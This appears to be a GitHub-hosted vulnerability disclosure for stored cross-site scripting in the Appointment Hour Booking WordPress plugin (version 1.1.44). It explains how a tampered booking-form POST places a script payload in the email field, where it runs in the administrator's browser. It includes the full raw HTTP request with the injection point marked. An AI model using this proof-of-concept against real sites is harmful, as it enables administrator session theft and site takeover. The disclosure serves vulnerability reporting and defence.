Permalink
Cannot retrieve contributors at this time
Name already in use
A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?
CVE-s/Appointment Hour Booking – WordPress Booking Plugin -- stored XSS
Go to fileThis commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
74 lines (56 sloc)
2.8 KB
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Vendor Homepage: https://apphourbooking.dwbooster.com/ | |
| # Software Link: https://wordpress.org/plugins/appointment-hour-booking/ | |
| # Version: 1.1.44 | |
| In Appointment Hour Booking – WordPress Booking Plugin it is possible to tamper the HTTP POST request to bypass front-end data validation and send an XSS payload to be stored and executed in administrator's web interface. | |
| It is performed if a public appointment booking form is present. An attacker may send a valid e-mail address in the "E-mail" field and intercept the request to replace and address with an XSS payload. | |
| The payload is then executed in administrator's browser when he opens the booking entries page. | |
| It allows an attacker to execute any JS payloads resulting in information disclosure, privilege escalation and modification of the source code to get RCE. | |
| POST /cve/wordpress/ HTTP/1.1 | |
| Host: 192.168.0.191 | |
| User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:67.0) Gecko/20100101 Firefox/67.0 | |
| Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 | |
| Accept-Language: ru-RU,ru;q=0.8,en-US;q=0.5,en;q=0.3 | |
| Accept-Encoding: gzip, deflate | |
| Referer: http://192.168.0.191/cve/wordpress/ | |
| Content-Type: multipart/form-data; boundary=---------------------------29750584827203 | |
| Content-Length: 1451 | |
| DNT: 1 | |
| Connection: close | |
| Cookie: PHPSESSID=6mefvemchb9mrm2g9dsjd1r3tn; rand_code_1=74617fe239a71a602469791bde16fe49 | |
| Upgrade-Insecure-Requests: 1 | |
| -----------------------------29750584827203 | |
| Content-Disposition: form-data; name="cp_pform_psequence" | |
| _1 | |
| -----------------------------29750584827203 | |
| Content-Disposition: form-data; name="cp_appbooking_pform_process" | |
| 1 | |
| -----------------------------29750584827203 | |
| Content-Disposition: form-data; name="cp_appbooking_id" | |
| 1 | |
| -----------------------------29750584827203 | |
| Content-Disposition: form-data; name="cp_ref_page" | |
| http://192.168.0.191/cve/wordpress/ | |
| -----------------------------29750584827203 | |
| Content-Disposition: form-data; name="form_structure_1" | |
| -----------------------------29750584827203 | |
| Content-Disposition: form-data; name="refpage_1" | |
| http://192.168.0.191/cve/wordpress/ | |
| -----------------------------29750584827203 | |
| Content-Disposition: form-data; name="fieldname1_1" | |
| 2019-07-18 10:00/11:00 0 1 | |
| -----------------------------29750584827203 | |
| Content-Disposition: form-data; name="fieldname1_1_services" | |
| 0 | |
| -----------------------------29750584827203 | |
| Content-Disposition: form-data; name="fieldname1_1_capacity" | |
| 0 | |
| -----------------------------29750584827203 | |
| Content-Disposition: form-data; name="tcostfieldname1_1" | |
| 1.00 | |
| -----------------------------29750584827203 | |
| Content-Disposition: form-data; name="email_1" | |
| aaa@a.test <== replace by <script>...</script> payload | |
| -----------------------------29750584827203 | |
| Content-Disposition: form-data; name="hdcaptcha_cp_appbooking_post" | |
| ldqli | |
| -----------------------------29750584827203-- |